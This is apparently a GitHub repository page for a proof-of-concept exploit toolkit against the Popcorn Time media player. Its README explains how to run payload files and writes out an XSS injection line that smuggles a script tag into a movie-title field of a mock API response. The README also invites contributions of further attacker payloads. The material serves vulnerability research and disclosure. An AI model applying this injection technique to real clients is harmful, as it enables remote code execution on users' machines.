PoC Code and Exploit Payloads for Popcorn Time Vulnerabilities
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
api/v2
1.js
2.js
3.js
4.js
5.js
LICENSE
README.md
start-test-osx.sh

README.md

Popcorn Time Exploit Toolkit

In this repository you can find everything you need to launch an attacked against the currently latest stable version of Popcorn Time (v0.3.8-1). All the attacks are remote, but for the sake of simplicity they are currently ran on the same computer. For a detailed blog post, please click here.

Launching attacks

There are several attack payloads available in the main directory (files 1.js through 5.js). In the /api/v2/ folder there is a file called list_movies_pct.json. You can select the payload that will execute by changing in the 12th line:

"title_english": "Hot Pursuit<script src='http://127.0.0.1/1.js'></script>",

the script name. Then, from the main directory you need to run start-test-osx.sh:

./start-test-osx.sh

This will launch Popcorn Time with the selected payload.

Contributing

If you come up with creative ideas for payloads that an attacker can run, please create a Pull Request so we can enrich this repository.

Additionally, if you want to convert the current payloads to other operating systems or create launchers for them too, please feel free to do so and contribute them.

Disclaimer

All the content in this repository is provided as-is and for educational purposes only. The authors take no responsiblity for any action or damage that may be caused by using it.

For more information, please see the license.